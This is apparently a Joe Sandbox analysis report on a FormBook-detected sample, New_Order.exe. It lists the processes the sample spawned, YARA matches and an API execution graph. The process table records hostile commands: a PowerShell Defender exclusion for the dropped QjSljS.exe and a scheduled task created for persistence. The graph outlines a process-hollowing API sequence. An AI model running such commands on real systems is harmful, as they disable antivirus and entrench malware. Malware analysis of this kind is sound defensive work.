                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:3
                                                                                              Start time:16:25:17
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:4
                                                                                              Start time:16:25:18
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QjSljS.exe
                                                                                              Imagebase:0x6e0000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:5
                                                                                              Start time:16:25:18
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:6
                                                                                              Start time:16:25:18
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpBC11.tmp
                                                                                              Imagebase:0x2a0000
                                                                                              File size:187'904 bytes
                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:7
                                                                                              Start time:16:25:18
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:8
                                                                                              Start time:16:25:18
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Users\user\Desktop\New_Order.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\Desktop\New_Order.exe
                                                                                              Imagebase:0x3b0000
                                                                                              File size:764'416 bytes
                                                                                              MD5 hash:E63F894AE694122FE230D5A91250BC1F
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:9
                                                                                              Start time:16:25:18
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Users\user\Desktop\New_Order.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\Desktop\New_Order.exe
                                                                                              Imagebase:0x120000
                                                                                              File size:764'416 bytes
                                                                                              MD5 hash:E63F894AE694122FE230D5A91250BC1F
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:10
                                                                                              Start time:16:25:18
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Users\user\Desktop\New_Order.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\Desktop\New_Order.exe
                                                                                              Imagebase:0x690000
                                                                                              File size:764'416 bytes
                                                                                              MD5 hash:E63F894AE694122FE230D5A91250BC1F
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1853449511.0000000001130000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1853449511.0000000001130000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1865768536.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1865768536.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:11
                                                                                              Start time:16:25:18
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Users\user\AppData\Roaming\QjSljS.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\AppData\Roaming\QjSljS.exe
                                                                                              Imagebase:0x90000
                                                                                              File size:764'416 bytes
                                                                                              MD5 hash:E63F894AE694122FE230D5A91250BC1F
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              • Detection: 68%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:13
                                                                                              Start time:16:25:22
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe"
                                                                                              Imagebase:0xcd0000
                                                                                              File size:140'800 bytes
                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4166636409.0000000002960000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4166636409.0000000002960000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                              Reputation:moderate
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:14
                                                                                              Start time:16:25:23
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpCEFD.tmp
                                                                                              Imagebase:0x2a0000
                                                                                              File size:187'904 bytes
                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:15
                                                                                              Start time:16:25:23
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:16
                                                                                              Start time:16:25:23
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Users\user\AppData\Roaming\QjSljS.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\AppData\Roaming\QjSljS.exe
                                                                                              Imagebase:0x40000
                                                                                              File size:764'416 bytes
                                                                                              MD5 hash:E63F894AE694122FE230D5A91250BC1F
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:17
                                                                                              Start time:16:25:23
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Users\user\AppData\Roaming\QjSljS.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\AppData\Roaming\QjSljS.exe
                                                                                              Imagebase:0x1c0000
                                                                                              File size:764'416 bytes
                                                                                              MD5 hash:E63F894AE694122FE230D5A91250BC1F
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:18
                                                                                              Start time:16:25:23
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Users\user\AppData\Roaming\QjSljS.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\AppData\Roaming\QjSljS.exe
                                                                                              Imagebase:0x890000
                                                                                              File size:764'416 bytes
                                                                                              MD5 hash:E63F894AE694122FE230D5A91250BC1F
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.1910549824.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.1910549824.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:19
                                                                                              Start time:16:25:24
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Windows\SysWOW64\wextract.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\wextract.exe
                                                                                              Imagebase:0xeb0000
                                                                                              File size:136'192 bytes
                                                                                              MD5 hash:B9CC7E24DB7DE2E75678761B1D8BAC3E
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.4164625509.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.4164625509.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.4166864709.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.4166864709.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.4166481175.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.4166481175.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:20
                                                                                              Start time:16:25:27
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe"
                                                                                              Imagebase:0xcd0000
                                                                                              File size:140'800 bytes
                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.4166642046.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.4166642046.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:21
                                                                                              Start time:16:25:30
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Windows\SysWOW64\wextract.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\wextract.exe
                                                                                              Imagebase:0xeb0000
                                                                                              File size:136'192 bytes
                                                                                              MD5 hash:B9CC7E24DB7DE2E75678761B1D8BAC3E
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.1910322852.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.1910322852.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:23
                                                                                              Start time:16:25:37
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe"
                                                                                              Imagebase:0xcd0000
                                                                                              File size:140'800 bytes
                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.4168479789.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000017.00000002.4168479789.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:26
                                                                                              Start time:16:25:49
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                              Imagebase:0x7ff6bf500000
                                                                                              File size:676'768 bytes
                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Disassembly

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:10.1%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:121
                                                                                                Total number of Limit Nodes:7
                                                                                                execution_graph 26206 df09170 26207 df092fb 26206->26207 26209 df09196 26206->26209 26209->26207 26210 df077b8 26209->26210 26211 df093f0 PostMessageW 26210->26211 26212 df0945c 26211->26212 26212->26209 26213 ee4668 26214 ee467a 26213->26214 26215 ee4686 26214->26215 26217 ee4778 26214->26217 26218 ee479d 26217->26218 26222 ee4888 26218->26222 26226 ee4878 26218->26226 26223 ee48af 26222->26223 26225 ee498c 26223->26225 26230 ee4248 26223->26230 26228 ee48af 26226->26228 26227 ee498c 26227->26227 26228->26227 26229 ee4248 CreateActCtxA 26228->26229 26229->26227 26231 ee5918 CreateActCtxA 26230->26231 26233 ee59db 26231->26233 26304 eed0b8 26305 eed0fe 26304->26305 26309 eed298 26305->26309 26312 eed287 26305->26312 26306 eed1eb 26310 eed2c6 26309->26310 26315 eec9a0 26309->26315 26310->26306 26313 eec9a0 DuplicateHandle 26312->26313 26314 eed2c6 26313->26314 26314->26306 26316 eed300 DuplicateHandle 26315->26316 26317 eed396 26316->26317 26317->26310 26318 eead38 26319 eead47 26318->26319 26322 eeae30 26318->26322 26330 eeae21 26318->26330 26323 eeae41 26322->26323 26324 eeae64 26322->26324 26323->26324 26338 eeb0c8 26323->26338 26342 eeb0b8 26323->26342 26324->26319 26325 eeae5c 26325->26324 26326 eeb068 GetModuleHandleW 26325->26326 26327 eeb095 26326->26327 26327->26319 26331 eeae41 26330->26331 26332 eeae64 26330->26332 26331->26332 26336 eeb0c8 LoadLibraryExW 26331->26336 26337 eeb0b8 LoadLibraryExW 26331->26337 26332->26319 26333 eeae5c 26333->26332 26334 eeb068 GetModuleHandleW 26333->26334 26335 eeb095 26334->26335 26335->26319 26336->26333 26337->26333 26339 eeb0dc 26338->26339 26341 eeb101 26339->26341 26346 eea870 26339->26346 26341->26325 26343 eeb0c8 26342->26343 26344 eea870 LoadLibraryExW 26343->26344 26345 eeb101 26343->26345 26344->26345 26345->26325 26347 eeb2a8 LoadLibraryExW 26346->26347 26349 eeb321 26347->26349 26349->26341 26234 df088f8 26235 df0890b 26234->26235 26236 df08924 26235->26236 26239 df08c0c 26235->26239 26259 df08d2d 26235->26259 26272 df06de0 26239->26272 26276 df06dd4 26239->26276 26240 df08d18 26243 df08efa 26240->26243 26251 df06b51 WriteProcessMemory 26240->26251 26252 df06b58 WriteProcessMemory 26240->26252 26241 df08c40 26241->26240 26257 df06760 Wow64SetThreadContext 26241->26257 26258 df06759 Wow64SetThreadContext 26241->26258 26242 df08ca3 26242->26240 26246 df06c41 ReadProcessMemory 26242->26246 26247 df06c48 ReadProcessMemory 26242->26247 26243->26236 26244 df08ce8 26244->26240 26248 df06a90 VirtualAllocEx 26244->26248 26249 df06838 VirtualAllocEx 26244->26249 26250 df06828 VirtualAllocEx 26244->26250 26245 df08f56 26245->26240 26255 df06b51 WriteProcessMemory 26245->26255 26256 df06b58 WriteProcessMemory 26245->26256 26246->26244 26247->26244 26248->26245 26249->26245 26250->26245 26251->26240 26252->26240 26255->26240 26256->26240 26257->26242 26258->26242 26260 df08d37 26259->26260 26260->26259 26262 df08bde 26260->26262 26263 df08d1d 26260->26263 26280 df06b51 26260->26280 26284 df06b58 26260->26284 26288 df06760 26260->26288 26292 df06759 26260->26292 26296 df066a9 26260->26296 26300 df066b0 26260->26300 26261 df08efa 26261->26236 26262->26236 26263->26261 26270 df06b51 WriteProcessMemory 26263->26270 26271 df06b58 WriteProcessMemory 26263->26271 26270->26263 26271->26263 26273 df06e69 CreateProcessA 26272->26273 26275 df0702b 26273->26275 26277 df06de0 CreateProcessA 26276->26277 26279 df0702b 26277->26279 26281 df06ba0 WriteProcessMemory 26280->26281 26283 df06bf7 26281->26283 26283->26260 26285 df06ba0 WriteProcessMemory 26284->26285 26287 df06bf7 26285->26287 26287->26260 26289 df067a5 Wow64SetThreadContext 26288->26289 26291 df067ed 26289->26291 26291->26260 26293 df06760 Wow64SetThreadContext 26292->26293 26295 df067ed 26293->26295 26295->26260 26297 df066b0 ResumeThread 26296->26297 26299 df06721 26297->26299 26299->26260 26301 df066f0 ResumeThread 26300->26301 26303 df06721 26301->26303 26303->26260 26350 df08688 26352 df0868b 26350->26352 26351 df08690 26351->26351 26352->26351 26357 df06838 26352->26357 26354 df0871d 26355 df06838 VirtualAllocEx 26354->26355 26356 df086f8 26355->26356 26358 df0686d 26357->26358 26359 df06ae2 VirtualAllocEx 26358->26359 26361 df068c0 26358->26361 26360 df06b15 26359->26360 26360->26354 26361->26354

                                                                                                Executed Functions

                                                                                                Function 0DF00278 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (d^$
                                                                                                • API String ID: 0-321367866
                                                                                                • Opcode ID: ba146503224dfcefd465da550bae47a957efe1823a3ccef1da3aae7f7cb060f2
                                                                                                • Instruction ID: 93495058eef54eca94acae2c9e68664022dcdc8def816a3628d52cf1e36984d6
                                                                                                • Opcode Fuzzy Hash: ba146503224dfcefd465da550bae47a957efe1823a3ccef1da3aae7f7cb060f2
                                                                                                • Instruction Fuzzy Hash: 96B11571E05219DFDB59CFAAD98069EFBB6FF88300F10D52AD415AB264EB309902CF04
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0DF00268 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (d^$
                                                                                                • API String ID: 0-321367866
                                                                                                • Opcode ID: 7846f581acc9017444bcfe05cca5a584b22925bfd0ab09273d0734ce639c51b0
                                                                                                • Instruction ID: 11e25bed1bc702e986b1acb50aadb01f54681d81e9ddfc87859a9d4f26cb40cc
                                                                                                • Opcode Fuzzy Hash: 7846f581acc9017444bcfe05cca5a584b22925bfd0ab09273d0734ce639c51b0
                                                                                                • Instruction Fuzzy Hash: 35B11771E05219DFDB58CFAAD98069EFBB6FF88310F10D52AD415AB264EB349902CF04
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0DF007A0 Relevance: .1, Instructions: 146COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c4cc0beafbfd01b6ebc1328f0a8eb9bac6d65dc3e87f4f6c20dd0ddc7d4c1855
                                                                                                • Instruction ID: b6ac52ad5607c70dce920bec0ab3335258c0613bcba1e8c531d0ada304651210
                                                                                                • Opcode Fuzzy Hash: c4cc0beafbfd01b6ebc1328f0a8eb9bac6d65dc3e87f4f6c20dd0ddc7d4c1855
                                                                                                • Instruction Fuzzy Hash: 7251A2B4E051199FCB04DFAAD5809AEFBF2BF88300F24D565E418A7255DB30A942DF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0DF00791 Relevance: .1, Instructions: 96COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 95f18ef016d754d0169c3282cdbdafe016b86c4125a4edb0f454fc9441a02f3b
                                                                                                • Instruction ID: aaa4b44413de6a1ee54a35a6dc5920d6d11354f250f8ae2242c76a85ba968d3b
                                                                                                • Opcode Fuzzy Hash: 95f18ef016d754d0169c3282cdbdafe016b86c4125a4edb0f454fc9441a02f3b
                                                                                                • Instruction Fuzzy Hash: CB41C3B5E015099FDB08CFAAD58169EFBF2BF88310F18D16AE418A7355DB309942CB80
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00EEAE30 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 200COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 428 eeae30-eeae3f 429 eeae6b-eeae6f 428->429 430 eeae41-eeae4e call ee9838 428->430 431 eeae83-eeaec4 429->431 432 eeae71-eeae7b 429->432 437 eeae64 430->437 438 eeae50 430->438 439 eeaec6-eeaece 431->439 440 eeaed1-eeaedf 431->440 432->431 437->429 483 eeae56 call eeb0c8 438->483 484 eeae56 call eeb0b8 438->484 439->440 442 eeaf03-eeaf05 440->442 443 eeaee1-eeaee6 440->443 441 eeae5c-eeae5e 441->437 444 eeafa0-eeb060 441->444 445 eeaf08-eeaf0f 442->445 446 eeaee8-eeaeef call eea814 443->446 447 eeaef1 443->447 478 eeb068-eeb093 GetModuleHandleW 444->478 479 eeb062-eeb065 444->479 448 eeaf1c-eeaf23 445->448 449 eeaf11-eeaf19 445->449 450 eeaef3-eeaf01 446->450 447->450 452 eeaf25-eeaf2d 448->452 453 eeaf30-eeaf39 call eea824 448->453 449->448 450->445 452->453 459 eeaf3b-eeaf43 453->459 460 eeaf46-eeaf4b 453->460 459->460 462 eeaf4d-eeaf54 460->462 463 eeaf69-eeaf6d 460->463 462->463 464 eeaf56-eeaf66 call eea834 call eea844 462->464 466 eeaf73-eeaf76 463->466 464->463 468 eeaf78-eeaf96 466->468 469 eeaf99-eeaf9f 466->469 468->469 480 eeb09c-eeb0b0 478->480 481 eeb095-eeb09b 478->481 479->478 481->480 483->441 484->441
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00EEB086
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1754868036.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID: DO$DO
                                                                                                • API String ID: 4139908857-1331050724
                                                                                                • Opcode ID: 4a8729ad81104aa27aadcc803c86c107fbc0d7412e754793b387f0e4911bce64
                                                                                                • Instruction ID: e040a9f2c91d5f78af50a20a5bfb9c13d6ba92c303897c5a732c6fd31fefb3b6
                                                                                                • Opcode Fuzzy Hash: 4a8729ad81104aa27aadcc803c86c107fbc0d7412e754793b387f0e4911bce64
                                                                                                • Instruction Fuzzy Hash: 5E7135B0A00B898FD724DF2AD04575ABBF1FF88304F04992DE44AE7A50D775E94ACB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0DF06DD4 Relevance: 1.8, APIs: 1, Instructions: 254processCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
